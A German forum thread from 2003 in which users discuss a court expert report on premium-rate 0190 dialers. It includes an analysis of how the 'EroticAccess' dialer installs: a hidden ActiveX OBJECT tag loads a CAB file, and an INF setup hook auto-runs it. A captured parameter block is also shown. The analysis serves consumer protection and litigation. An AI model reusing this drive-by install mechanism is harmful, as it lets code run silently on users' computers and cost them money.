# Ein Sachverständigengutachten zum Thema Dialer



## Anonymous (28 Mai 2003)

Beim Sufen habe ich folgende URL gefunden:

Hinweis: Ich bin keine Partei dieses Verfahrens, kenne keinen der Beteiligten und habe auch mit der Seite nicht das geringste zu tun.


Unter http://www.anwaltskanzlei-boehm.de/laufende_Verfahren/Verfahren_190-Dialer/Gutachten.pdf
kann einGutachten (Stand: März 2003) eines "öffentlich bestellten und vereidigtigten" Sachverständigen für Computersoftware und Programmiertechnik heruntergeladen werden.
Das Gutachten gehört zu diesem Fall http://www.anwaltskanzlei-boehm.de/laufende_Verfahren/Verfahren_190-Dialer/verfahren_190-dialer.html


----------



## Smigel (28 Mai 2003)

Auhaha,
da hat aber einer nur die Hälfte recherchiert, die meisten Dialer die auf dem Rechner installiert waren sind durch die ActiveX-Controls autostartfähig. Desweiteren fehlt mir der TTW-Dialer welcher auch eine automatische Einwahl ausführt.


----------



## Anonymous (28 Mai 2003)

*Gerichtliches Sachverständigengutachten*

@ Smigel:
Vielleicht sollten Sie diese Erkenntnis umgehend dem Gutachter (E-Mail-Adresse steht im verlinkten Gutachten) und eventuell auch der Anwaltskanzlei, die die Seite erstellt hat mitteilen.

Immerhin ist dieses Gutachten anscheinend ein zentrales Beweisstück in einem Verfahren.

Frage nur aus Interesse an die versammelten Juristen:
Was könnte man eigentlich machen, wenn man als ein Verfahrensbeteiligter mit einem Gutachten nicht zufrieden ist? Kann man da Einspruch erheben? Wer zahlt die Kosten für das erste Gutachten wenn der zweite Gutachter nachweisen würde, dass der erste Gutachter Fehler gemacht hat (zB. irgendwelche Fakten versehentlich nicht berücksichtigt,...)


----------



## Smigel (28 Mai 2003)

schon geschehen


----------



## Anonymous (28 Mai 2003)

*Mitteilung an Sachverständigen*

@ Smigel:
Könnten Sie auch den Text der Mitteilung oder Auszüge davon posten; ggfs. anonymisiert und natürlich ohne vertrauliche Passagen.

Da ja im Gutachten auf die "Nachbarseite" www.dialerschutz.de verwiesen wurde, ist es aufgrund der gegenseitigen Verlinkungen nicht gänzlich ausgeschlossen, dass hier auch irgendwelche anderen Sachverständigen mitlesen, diese sind sicher über Anregungen, Hinweise etc. dankbar, vor allem wenn sie nicht aktiv danach fragen müssen.


----------



## Der Jurist (29 Mai 2003)

*Re: Gerichtliches Sachverständigengutachten*



			
				Gast schrieb:
			
		

> ....
> Frage nur aus Interesse an die versammelten Juristen:
> Was könnte man eigentlich machen, wenn man als ein Verfahrensbeteiligter mit einem Gutachten nicht zufrieden ist? Kann man da Einspruch erheben? Wer zahlt die Kosten für das erste Gutachten wenn der zweite Gutachter nachweisen würde, dass der erste Gutachter Fehler gemacht hat (zB. irgendwelche Fakten versehentlich nicht berücksichtigt,...




o je, o je, o weh, o weh. Das sind die Fragen, die besonders schwer zu beantworten sind. Wenn es sich um einen "privaten", also "vorgerichtlichen" Gutachter handelt, gilt neuen Gutachter beauftragen, beide bezahlen. Falls Prozess gewonnen, gibt es das Honorar für den Gutachter dessen Gutachten im Prozess vorgelegen hat, wenn das Gericht zur Auffassung kommt, dass ein Gutachten nötig war.

Wurde der Gutachter vom Gericht bestellt, kann man versuchen mit einen eigenen Gutachten, das andere Gutachten zu erschüttern.
Aber bitte die Begeisterung des Gerichtes bedenken, das erklären muss, dass es bislang einen Dilletanten beauftragt hatte. Faktisch passiert das nie.


----------



## Comedian1 (29 Mai 2003)

*Beweisfrage*

@Smigel

Grundsätzlich hast du Recht. Das Gutachten beleuchtet nicht, ob die Dialer über ActiveX oder Skripte auf Webseiten oder sonstwie fernsteuerbar sind. Der Gutachter dürfte oder müsste das wissen. 

Zur Ehrenrettung des Gutachters sollte man aber auch den Untersuchungsauftrag studieren:

'Stellt das Dialer-Programm die Internetbenutzung ohne Zutun des Benutzers her?'

So ganz eindeutig bezieht der Untersuchungsauftrag die Untersuchung der Fernsteuerungsfähigkeit des Dialers nicht ein. 

Meiner Meinung nach hätte man dem Gutachter zusätzlich eine weitere Beweisfrage stellen müssen, ob die Dialer über Skripte oder Backdoor Software fernsteuerbar sind. Zu denken wäre hier an eine Untersuchung der gecachten Webseiten und Skripdateien.

Meiner Meinung nach kann diese weitere Beweisfrage dem Gutachter ja noch vorgelegt werden, ohne dass man ein schlechte Arbeitsweise unterstellen muss. Er selbst bietet ja die Ergänzung seines Gutachtens  betreffend einer DLL an.

Gruss
Comedian


----------



## Smigel (29 Mai 2003)

Hmm, sagen wir es mal so, es gibt mehrere Möglichkeiten eine Dialer zum wählen zu bringen.

'Stellt das Dialer-Programm die Internetbenutzung ohne Zutun des Benutzers her?'

Da stellt sich die Frage was was die unter Dialer-Programm verstehen.

Wenn man den Dialer alleine betrachtet dann kann er sowas nur unterstützen(z.B. Parameterübergabe beim Aufruf des Dialers)

Wenn man es genau nimmt muss man aber auch die Auslieferung bzw. die Installtionsart des Dialers mitbetrachten.

Als Beispiel der TTW Dialer:

Der Dialer wird als .cab-Datei ausgeliefert. Diese Datei wird nach dem herunterladen automatisch entpackt. Die in der .cab-Datei enthaltene Installationsanweisung gibt vor das der Dialer sofort nach dem entpacken gestartet wird und eine Anwahl ausführt.

Wenn man den Dialer nun ohne den Installationsablauf beurteilt wird man übersehen das er Startparameter unterstützt und beurteilt ihn als einwandfrei da er alles anzeigt. Das das bei der Installation nicht der Fall ist wird dadurch übersehen.


----------



## Comedian1 (30 Mai 2003)

*TTW Dialer*



			
				Smigel schrieb:
			
		

> Hmm, sagen wir es mal so, es gibt mehrere Möglichkeiten eine Dialer zum wählen zu bringen.
> 
> 'Stellt das Dialer-Programm die Internetbenutzung ohne Zutun des Benutzers her?'
> 
> ...



Wo du völlig recht hast. 

Was ich immer wieder sehe im Zusammenhang mit der Deinstalltion von Dialern bzw Backdoor Software sind verräterische Einträge in der Registry, die zu automatischen Verbindungsversuchen ins Internet führen. 

Ich würde auch den Code auf den gecachten Internet-Seiten mal durchsehen; dann sieht man, wie die Seite funzt und wie der Dialer heruntergeladen wird.  Bei TTW kommt eine Zertifikatsabfrage, der Dialer wird heruntergeladen (ich glaube es ging über ActiveX, bin mir aber nicht mehr sicher) und verbindet sich zunächst mit dem Server MAIL.WOBZ.DE. Er identifiziert sich am Server und der Account wird freigeschalten. Das geschieht alles im Hintergrund; mit einem Sniffer kann man es hinterher nachvollziehen. Danach wird die Internetverbindung getrennt und dem Nutzer wird vorgegaukelt, es werde eine Verbindung zu einem Gratisangebot aufgebaut. Der Dialer wählt dann an, und verbindet sich über einen bestimmten Port zum Server; ich hatte den Eindruck, er funktioniert wie ein lokaler Proxy.

Gruß
Comedian


----------



## Smigel (30 Mai 2003)

> Ich würde auch den Code auf den gecachten Internet-Seiten mal durchsehen; dann sieht man, wie die Seite funzt und wie der Dialer heruntergeladen wird.



Genau, sieht so aus wie bei den meisten Dialeristallationen, der Dialer wird als Objekt ins HTML eingebunden.



> Bei TTW kommt eine Zertifikatsabfrage, der Dialer wird heruntergeladen (ich glaube es ging über ActiveX, bin mir aber nicht mehr sicher) und verbindet sich zunächst mit dem Server MAIL.WOBZ.DE.



Das Zertifikat bestätigt nur das die .cab-Datei im Originalzustand vom Hersteller ist. Das diese Systemmeldung zum anzeigen von AGBs oder ähnlichem genutzt wird war eigentlich nicht vorgesehen. Dadurch werden die meisten Nutzer getäuscht, da sie diese Anzeige z.B.  vom Windows Update kennen.  Es vermutet niemand das mit diesem Klick eine bestätigung zur Anwahl erfolgt. Ich denke auch das von diesem Klick keine Zustimmung zum Vertrag abgeleitet werden kann.

Ja, das fällt unter ActiveX.

Ich vermute mal das mail.wobz.de der Server ist der die Statistik für die "Webmaster" bereitstellt.





> Er identifiziert sich am Server und der Account wird freigeschalten. Das geschieht alles im Hintergrund; mit einem Sniffer kann man es hinterher nachvollziehen. Danach wird die Internetverbindung getrennt und dem Nutzer wird vorgegaukelt, es werde eine Verbindung zu einem Gratisangebot aufgebaut. Der Dialer wählt dann an, und verbindet sich über einen bestimmten Port zum Server; ich hatte den Eindruck, er funktioniert wie ein lokaler Proxy.



Hab mir das ganze bis zum Einwahlvorgang angeschaut, die Einwahl wird hier konsequent geblockt, hast Du zufälligerweise ein Protokoll vom Sniffer erstellen lassen ? Ich gehe davon aus das deren Server mit den Inhalten hinter einer Firewall steht, also wird der Dialer den Port nutzen um eine Verbindung mit dem Server herzustellen.
Weil "http://192.168.193.6/contentgateway/" liegt definitiv in einem privaten Netzwerk.

Desweitern bezieht der Dialer die Nummer aus der Seite von der er aufgerufen wird wenn ich mich richtig erinnere. Damit hat man dann Probleme wenn man nachträglich am der Nummer  herausfinden will welcher Dialer der Übeltäter war.


----------



## Comedian1 (30 Mai 2003)

*TTW Dialer*

Mein Versuch fand am 13.11.2002 statt und lief wie folgt ab:


```
Also, ich hab die w*w.eingang69.de (VORSICHT: DIALERDOWNLOAD!) mal getestet (ist Teleteamwork ...).
Die preisen auf der Startsite zunächst ohne Hinweis auf ein automatisches Dailerdownload 15 Minuten Gratis Sex Videos an (Wie erhält man 15min freie Sexvideos -> hier clicken!).
Tut man das, dann erscheint eine Seite, wo sich dich darauf hinweisen, daß sie den Sex Zugang einrichten. Meine Firewall sprach schon unmittelbar nach Auftauchen der Site an, und meldete, daß der Dialer Kontakt zum Internet sucht. Der Mistdailer hatte sich also über Port 80 binnen weniger Sekunden heruntergeladen, ohne daß ich gefragt wurde und ohne zu fragen, will er Daten ins Internet senden. Das geschieht also hinter dem Rücken des Users, der 15min gratis Sex wollte, und möglicherweise gerade den Hinweis liest, daß es doch sauteuer wird.
Du wirst dann automatisch weitergeleitet auf eine Site, wo dann 'Jetzt geht's los' steht. Immernoch kein Hinweis auf den 0190 Dialer. Lt Firewall versucht der Dailer - ohne Wissen des Kunden - sich als Server zu registrieren, womit er dann eingehende Internetverbindungen akzeptieren kann. Danach versucht er, sich mit der IP 80.63.1.5 zu verbinden (Server mail.wobz.de - Domäne registriert auf Tele Team Work GmbH in Harrislee, Deutschland). Clickt man auf 'Jetzt gehts los', dann wird über Port 6789 versucht, sich irgenwohin zu verbinden. Der Port ist bei mir geblockt, daher Ende des Experiments.
```

Ein weiterer Test vom 15.11.2002


```
Habe es nachvollzogen:

1. w*w.erotikzugang.de: Dort click auf großen Button mit Gratissex Angebot löst automatische Weiterleitung zu w*w.eingang69.de aus
2. Noch während man die 'Sicherheitswarnung Herunterladen und Ausführen von EroticAccess' (ein GIF, eine Sicherheitswarnung kommt nicht) betrachtet, lädt sich 'EroticAccess.exe' (ein HTTPModemdialer) herunter, und verbindet sich im Hintergrund mit
mail.wobz.de
3. Recht zügige automatische Weiterleitung auf eine Site 'Jetzt gehts los...hier clicken...Keine Kreditkarte'
4. Und schwupps war ich wieder bei http://localhost...Die weitere Verbindung kommt wg geblockten Ports nicht zustande

Blockt man bei Schritt 2. die Verbindung des HttpModemDialers mit mail.wobz.de, dann und nur dann kommt ein Popup, bei dem du
entscheiden kannst, ob du eine browser_plugin_ver216.exe herunterladen willst. Das ist dann 0190 Dialer - also gerade kein Browserplugin - , der dich über den Preis aufklärt, ohne daß er automatisch anwählt (dh man muß auf einen 'Verbinden' Button clicken).
```

Protokolle habe ich leider nicht mehr. 

Gruß
Comedian


----------



## technofreak (30 Mai 2003)

siehe PN
gruß 
tf


----------



## Anonymous (6 Juni 2003)

*eroticaccess.exe*

an comedian1:
was passiert, wenn man keine ports geblockt hat? wir haben nämlich auch diesen dialer bei uns gefunden, haben ihn aber weder bewusst heruntergeladen noch über ihn uns verbinden lassen
gruß, JUAN


----------



## Anonymous (6 Juni 2003)

*eroticaccess.exe*

Ist denn dann überhaupt ein Schaden entstanden?

Um Tele Team Work AsP ist es sehr ruhig geworden - seitdem die bei einer neuen TK-Gesellschaft in Mainz untergekommen sind, guckt man denen gehörig auf die Finger. Talkline wickelt derzeit nur noch das Restgeschäft ab.

Übrigens hatte ich bei TTW immer den Eindruck, dass die mit zwei unterschiedlichen Produkten arbeiten - eines über "eingang69" so wie es sein soll und ein weiteres unter Verwendung von "eingang69" aber über eine gefacte Scriptsteuerung. Merkwürdig ist dabei schon, dass davon überwiegend Freenet- und WEB.de-Kunden betroffen waren - TTW hatte dort Werbung geschaltet.


----------



## Comedian1 (6 Juni 2003)

*Re: eroticaccess.exe*



			
				juan schrieb:
			
		

> an comedian1:
> was passiert, wenn man keine ports geblockt hat? wir haben nämlich auch diesen dialer bei uns gefunden, haben ihn aber weder bewusst heruntergeladen noch über ihn uns verbinden lassen
> gruß, JUAN



Ich habe den Port nicht freigeschalten und kann daher nix dazu sagen.

Normalerweise verbindet sich der PC, wenn er einen anderen Rechner kontaktieren will, über einen seiner offenen Ports mit dem anderen Rechner. Ich denke also, er wird seinen Server (mail.wobz.de) gesucht haben (Spekulation)

Gruß
Comedian


----------



## Comedian1 (6 Juni 2003)

*Re: eroticaccess.exe*



			
				anna schrieb:
			
		

> Ist denn dann überhaupt ein Schaden entstanden?
> 
> Um Tele Team Work AsP ist es sehr ruhig geworden - seitdem die bei einer neuen TK-Gesellschaft in Mainz untergekommen sind, guckt man denen gehörig auf die Finger. Talkline wickelt derzeit nur noch das Restgeschäft ab.
> 
> Übrigens hatte ich bei TTW immer den Eindruck, dass die mit zwei unterschiedlichen Produkten arbeiten - eines über "eingang69" so wie es sein soll und ein weiteres unter Verwendung von "eingang69" aber über eine gefacte Scriptsteuerung. Merkwürdig ist dabei schon, dass davon überwiegend Freenet- und WEB.de-Kunden betroffen waren - TTW hatte dort Werbung geschaltet.



Schaden bei dem Betroffenen, für den das Gutachten angefertigt wurde:

2400,00 EUR

Die TTW Software hatte die Einwahlnummer der AOL Software zugunsten TTW ausgetauscht. Beim Geschädigten entstand der Eindruck, er surfe weiter ganz normal über AOL.

Eine fristlose Kündigung durch TL ist schon bemerkenswert. Hat nämlich schweren Missbrauch der Rufnummer als Voraussetzung. Mal warten , wie lange es dauert, bis es wieder losgeht mit TTW...

Übrigens war keine der Webseiten, die ich in meinem Postin genannt habe, ok. Es waren Buttons drauf, die eindeutig mit 'GRATIS' gekennzeichnet waren; diese waren via Java genauso hinterlegt, wie die anderen Buttons, die auf ein kostenpflichtiges Angebot hingewiesen haben.
Sowas nennt man vorsätzliche Täuschung.

Wenn TTW bei Freenet und Web.de Werbung geschaltet hatte, dann ist es auch nicht merkwürdig, dass deren Kunden darauf reingefallen sind. 

Gruß
Comedian


----------



## Smigel (6 Juni 2003)

@Comedian1


> Die TTW Software hatte die Einwahlnummer der AOL Software zugunsten TTW ausgetauscht. Beim Geschädigten entstand der Eindruck, er surfe weiter ganz normal über AOL.



Nicht ganz, ein Dialer hat zwar die AOL-Software manipuliert aber der kommt nicht direkt von TTW.

@anna


> Übrigens hatte ich bei TTW immer den Eindruck, dass die mit zwei unterschiedlichen Produkten arbeiten - eines über "eingang69" so wie es sein soll und ein weiteres unter Verwendung von "eingang69" aber über eine gefacte Scriptsteuerung.



Kannst Du das bitte mal etwas genauer erklären?


----------



## Comedian1 (6 Juni 2003)

*Restliche Aufzeichnungen*

Ich habe den Rest meiner Aufzeichnungen zu dem TTW Dialer-Versuch wieder aufgefunden


```
Es erschien eine Verknüpfung auf dem Desktop. Klickt man sie einmal an, dann erscheint die Erläuterung 'Heisse Porno!!!Billig TIMEOUT=". Über den Dopplick darauf kommst man dann wieder auf die Zugangsseite, wo man dann etwas klein gedruckt unter lauter Werbung einen Hinweis auf die Preise findet.
Bei einem meiner Versuche habe ich das Download des Modemdialers unterbunden. Da wurde mir angeboten, ein Browserplugin in ein von mir zu wählendes Verzeichnis zu installieren. Es handelte sich in Wahrheit um ein selbstentpackendes Archiv. Das habe ich entpackt. Darauf hin war ein neues Icon auf meinem Desktop.
Bei einem Doppelclick hierauf entpuppte es sich als VPN - Dialer. Da war deutlich der Preis eingeblendet und man mußte auf einen Button zum Verbinden drücken. Ich hab das ausprobiert (mit abgezogenem Modemkabel). Das Ding hat nicht nur angewählt, sondern es hat in meinen DFÜ-Verbindungen eine neue VPN-Standardverbindung konfiguriert. Diese neue Standardverbindung hatte die ersten paar Buchstaben einer meiner anderen Verbindungen als Namen.
```

Gruß
Comedian


----------



## Anonymous (7 Juni 2003)

@Smigel

"... Kannst Du das bitte mal etwas genauer erklären?"

Genauer geht nicht, wegen laufendem Verfahren.

Aber eines ist gewiss - wenn jemand (XY) ein richtig funktionierende Produkt auf dem offenen XY-Markt anbietet und nebenbei ein faules Teil unter die gesunden mischt, dürfte der Beweis sehr schwer anzutreten sein, dass er die Verantwortung für die miesen Nebenprdukte zu übernehmen hat - weil: er bietet ja korrekte Ware an und kann dies auch nachweisen?!?!?!

In Sachen TTW wurden z. B. in Muc zahlreiche Verfahren eingestellt. In den Verfügungen wurde aber immerhin eine gewisse Möglichkeit dieser beispielhaften These eingeräumt, so dass ein Restverdacht nicht ausgeräumt worden ist.


----------



## Der Jurist (7 Juni 2003)

@ anna  

Kann man da ein Aktenzeichen bekommen, wegen zivilgerichtlicher Seite. 

Dort reichen Zweifel schon aus, um die Forderung erfolgreich zurückzuweisen.

Die StA bzw. die Pol. müsste bestätigen, dass möglicherweise auch ein faules Stück im Netz war.


----------



## Comedian1 (8 Juni 2003)

*Aktueller TTW Dialer*

Ganz sauber ist das mit dem aktuellen TTW Dialer auch nicht.

Es stellt sich aktuell so dar, dass man bei TTW auf Icons clickt, die Gratisinahlte versprechen. Offensichtlich hat TTW einen Pool von Links zur Auswahl. Scheinbar zufällig werden die Links dann ausgewählt.

Zeitlich bei meinem Versuch von gerade

```
22:30:01 Uhr: Eine Seite, wo der Kunde durch eine 'Sicherheitswarnung' von Windows auf die Installation und Ausführung eines 'Browser-Plugins' von TTW hingewiesen wird (wobei der Begriff 'Browser-Plugin' von TTW ins das Zertifikat geschrieben wird) erscheint. Das Zertifikat erscheint erst am Ende des Ladevorgangs, weil es als letztes geladen wird. Es erscheint nicht, wenn der Kunde in den Sicherheitseinstellungen des IE in der Zone Internet den Download von signierten ActiveX Steuerelementen ohne Nachfrage zuläßt:

22:30:02 Uhr: Der Object Tag, der dem IE mitteilt, wie er die ActiveX Komponenten zu installieren hat, wird geladen. Seine Anzeige wird verborgen (styles=display:hidden).
22:30:04 Uhr: Das Download der CAB-Datei beginnt
22:30:09 Uhr: CAB Datei ist heruntergeladen. Das Zertifikat wird als letztes geladen.
22:30:10 Uhr: Ordner F:\Dokumente und Einstellungen\Administrator\Lokale Einstellungen\Temp\ICD1.tmp wird erstellt und der Inhalt des CABs wird dort hineinkopiert, dh der Dialer EroticAccess.exe und einige weitere Dateien
22:30:10: Der Dialer wird über Internet Explorer gestartet (ohne mein Zutun).
22:30:11: Eine neue Instanz des IE wird vom Dialer gestartet
22:30:11: Dem Dialer wird folgender Datensatz übertragen:
{PHONENUMBER="0190061290",USERID="[email protected]",
PASSWORD="comein",DOMAIN="",
URL="http://www.Eingang69[color=red]xxxxxxxxxxxxxxxxxxxxxxx[/color]",
ALT_PHONENUMBER="01938775057",ALT_USERID="[email protected]",
ALT_PASSWORD="comein",ALT_DOMAIN="",
ALT_URL="http://www.Eingang69[color=red]xxxxxxxxxxxxxxxxxxxxxxxxxxxx[/color]",
TERTIARY_PHONENUMBER="TEMPLATE",
TERTIARY_USERID="[email protected]",
TERTIARY_PASSWORD="comein",TERTIARY_DOMAIN="",
TERTIARY_URL="http://www.Eingang69[color=red]xxxxxxxxxxxxxxxxxxxxxxxxxxx[/color],
DOWNLOADURL="http://www.eingang69[color=red]xxxxxxxxxxxxxxxxxxxxxxxxxxx[/color],
FAILUREURL="http://www.Eingang69[color=red]xxxxxxxxxxxxxxxxxxxxxxxxxx[/color]",
STARTURL="http://www.Eingang69[color=red]xxxxxxxxxxxxxxxxxxxxxxxxxx[/color],
DIALINGURL="http://www.Eingang69[color=red]xxxxxxxxxxxxxxxxxxxxxxxxxxxxx[/color]",
CLEARINGURL="",ACCESSURL="http://www.[color=red]sexxxxxxxxxxxxxxxxx[/color]/",
NOACCESSURL="http://www.[color=red]xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[/color]",
DIALERTYPE="1",
ENABLE_DOWNLOAD_SHORTCUT="1",UNIT_PRICE="299",
INITIAL_UNIT_PRICE="2999",SHORTCUT="Wobz",SHORTCUT_DE
E  `€>@ wÕP?‘þÊy P· ¢*ÿ²jÚ¦Pú?£d  SCRIPTION="Hier findest du
Alles!!!"BILLING_TIMEOUT="",}

Nachdem man den Download des Plugins bestätigt hat, gelangt man zum Disclaimer. Der Schritt entfällt, wenn der Download von signierten Steuerelementen in den Sicherheitseinstellungen ohne Bestätigung zugelassen ist. Dann geht alles vollautomatisch.

22:30:13: Disclaimer erscheint
Dort wird man am unteren Rand des Bildes kleingedruckt auf Kosten von 29,99 EUR pro Einwahl zzgl 2,99 EUR je weiterer Minute hingewiesen. Bei kleineren Monitoren ist dieser Zusatz nicht ohne Scrollen sichtbar

Klickt man dann auf den Button 'Sex-Access', dann beginnt ein Countdown von 100s. Bereits nach wenigen Sekunden wird die Verbindung getrennt und der Dialer wählt an.
```

Erläuterung des Autodownloads und Autostartmechanismus:


```
Dazu wird folgender Object Tag verwendet:

"<OBJECT height=0 width=0 styles=display:hidden classid=clsid:1230cb21-c88d-11cf-b347-000000000000 codebase=/EroticAccessxxx/[email protected]></object>"

Der Download Prozess

Das System arbeitet wie folgt,  wenn es eine den Inhlt einer .cab -Datei auf den Computer des Kunden kopiert

   1. Der Browser prüft die Registry auf die  Class ID im OBJECT tag. Wenn sie nicht gefunden wird, wird das CODEBASE Attribut verarbeitet. Wenn der Browser die  Class ID finder, wird die Datei, die über den Eintrag in der Registry referenziert wird geprüft, um zu sehen, ob sie aktuell ist. Ist sie das nicht, wird der Download ebenfalls fortgesetzt.

   2. Der Browser lädt die richtige .cab Datei herunter und entpackt sie in ein temporäres Verzeichnis

   3. Der Browser verarbeitet die zur cab. Datei gehörendene .inf Datei.

Dies ist die Installer.Inf:

"[Setup Hooks]
hook1=hook1
[hook1]
run=%EXTRACT_DIR%\EroticAccess.exe
FileVersion=1,0,0,4
[Version]
Signature=$CHICAGO$
AdvancedInf=2.0"

4. Zunächst wird der [Setup Hooks] Abschnitt vom IE verarbeitet. Die Zeile hook1=hook1 bewirkt, dass der Abschnitt [hook1] immer ausgeführt wird. Folglich ruft der IE dann über den Befehl 'run' im Abschnitt [Hook1] den Dialer auf. Ohne Zutun des Nutzers.

Der Mechanismus dient normalerweise dazu, Setup-Programme aufzurufen und wird hier für einen Autodialer missbraucht.
```

Mein Fazit:


```
* Der Download startet automatisch durch Click auf ein 'Gratis Bild'
* Die Installation läuft ohne bewusste Steuerung des Kunden ab
*Die Installation läuft im Hintergrund ab. Der Kunde wird nur über die Installation eines 'Browser-Plugins' informiert (Tarnung als harmloses Plugin), und auch nur dann, wenn die Sicherheitseinstellungen des IE für die Zone 'Internet' im Punkt 'Download von signierten ActiveX Steuerelementen' auf 'Fragen' gesetzt ist. Keine Meldung erscheint, wenn der Download von signierten ActiveX generell zugelassen ist.
* Der Kunde wird nur versteckt darüber informiert, dass sein normaler Internetzugang beendet wird und ein höherer Preis fällig wird. Auf kleinen Monitoren ist sind die Hinweise ohne Scrollen nach unten nicht erkennbar.
Der Preis steht auch im Widerspruch zu der Erwartung eines 'Gratis Bild', die TTW vorher beim Kunden geweckt hat. 
* Der Webdialer kann vom ungeübten Surfer nicht, oder nur unter größten Schwierigkeiten wieder vom PC entfernt werden. Es gibt keine Deinstallationsroutine.
```

Gruß
Comedian


Links zu Dialerseiten und kommerziellen Angeboten entsprechend der NUB entfernt.
DevilFrank


----------



## Heiko (8 Juni 2003)

@Comedian:
Bitte gib hier im Forum keine solchen Links ungekürzt an.
Wir haben hier auch Leute, die wir vor sich selber schützen müssen.

Neulich hat mich z.B. ein Dialeranbieter angerufen, der sich über einen Newsartikel beschweren wollte. Er kam darauf, nachdem er sich vor Traffic auf seiner Seite plötzlich nicht mehr retten konnte.
Ursache war offensichtlich, dass viele Besucher von Computerbetrug.de den (nicht aktiven!) Link in ihren Browser kopiert haben um nachzuschauen, ob das wirklich so gefährlich ist...

Diese kleine Anekdote soll verdeutlichen, warum wir hier nicht gerne Links in öffentlichen Artikeln haben. Bitte verschicke diese doch per PN oder Mail. Ich würde es nur sehr ungern sehen, dass wir durch Einträge im Forum auch noch Dialerumsätze generieren.


----------



## Anonymous (8 Juni 2003)

Der Jurist schrieb:
			
		

> @ anna
> 
> Kann man da ein Aktenzeichen bekommen, wegen zivilgerichtlicher Seite.
> 
> ...



@Jurist

das war ja Grund unseres Telefonates vom Freitag - die Informationen suche ich am Dienstag zusammen und komme nächste Woche unaufgefordert auf das Thema zurück. Werde allerdings nicht posten sondern pn senden.


----------



## Anonymous (8 Juni 2003)

@ Comedian1

das ist ja sehr interessant. Kannst Du mir bitte die URL (´s) als pn zur Kenntnis geben?

Nachdem ich nicht ganz unschuldig daran war, dass TTW mit rund 100.000 verfügbaren Nummern bei Tl ID rausflog, schaue ich Herrn Bo J. genau auf die Seiten und dokumentiere möglichst alles, was ich kriegen kann - somit habe ich schon gewissen Ermittlungsvorsprung, noch bevor Geschädigte beim mir erscheinen.
Außerdem klüngel ich ein bisschen mit dem neuen Provider. Dieser hatte mir seine ganze Unterstützung im Falle des Missbrauchs zugesichert, von der wir alle zehren können.


----------



## ForBi (12 Juni 2003)

@anna
Das Ende von TTW bei TL ist mir neu und erfreut mich sehr!  :bussi: 

@Comedian1
Meine Version (von 07.2002) scheint also veraltet?

params[1].htm
{PHONENUMBER="0190030037",
USERID="2051019",
PASSWORD="xxxxxs",
DOMAIN="",
URL="http://www.xxxxx.de/EroticAccess/redirect.asp?id=$DIALERID$&url=$ACCESSURL$",
ALT_PHONENUMBER="0190030037",
ALT_USERID="2051019",
ALT_PASSWORD="xxxxx",
ALT_DOMAIN="",
ALT_URL="http://www.xxxxx.de/Exxxxxs/redirect.asp?id=$DIALERID$&url=$ACCESSURL$",
BILLING_TIMEOUT="",
DIALERTYPE="1",
FAILUREURL="http://www.xxxxx.de/EroticAccess/t51/de/fehler.asp?id=$DIALERID$&url=$DOWNLOADURL$",
STARTURL="http://www.xxxxx.de/EroticAccess/t51/de/disclaimer.asp?id=$DIALERID$",
DIALINGURL="http://www.xxxxx.de/EroticAccess/t51/de/kontrol.asp?id=$DIALERID$",
CLEARINGURL="http://www.xxxxx.de/eroticaccess/clearing.asp?id=$DIALERID$&password=$PAGEPASSWORD$",
ACCESSURL="http://www.xxxxx.de/insite/adult/index.html?id=$DIALERID$&guid=$GUID$",
DOWNLOADURL="http://www.xxxxx.de/eroticaccess/t51/de/index.asp?id=$DIALERID$",
ENABLE_DOWNLOAD_SHORTCUT="1",SHORTCUT="Hard Core",
SHORTCUT_DESCRIPTION="Heisse Porno!!!"}

Mit meiner IE-Sicherheit 'niedrig' von Damals brauche ich mir
also Heute keine Vorwürfe zu machen, so gelinkt worden zu sein.

Die Stellungnahme meines RA auf die Klageschrift liegt ggw. dem
Richter vor und wir hoffen auf eine weise Entscheidung :-? 

Allen viel Glück und einen erträglichen Sonnentag ! Ciao

_URLs gelöscht, siehe NUB tf_


----------



## Der Jurist (12 Juni 2003)

@ Forbie

Hier im vierten Posting http://forum.computerbetrug.de/viewtopic.php?t=1207&postdays=0&postorder=asc&start=480


im Schreiben an das AG Wedding - der Text beginnt mir " Hilfsweise und rein vorsorglich ..." ist noch etwas Futter für Deinen Anwalt. Damit kann er der Gegenseite Probleme beweisen, wenn die darauf abstellen wollen, dass angewählt gleichbedeutend mit Vertragsschluss ist.


----------



## Comedian1 (12 Juni 2003)

*Dynamische Webseiten von TTW*



			
				ForBi schrieb:
			
		

> @anna
> @Comedian1
> Meine Version (von 07.2002) scheint also veraltet?



Jeder Mitschnitt ist nur eine Momentaufnahme. Die Einstiegsseiten hatten bei jedem Zugriff ein anderes Aussehen (die Bilder wurden stets getauscht). Die Durchsicht des Snifferprotokolls und des HTML Quellcodes bestätigen, dass die Seiten dynamisch erzeugt werden (mittels Adobe GoLive 6).

Gruß
Comedian


----------

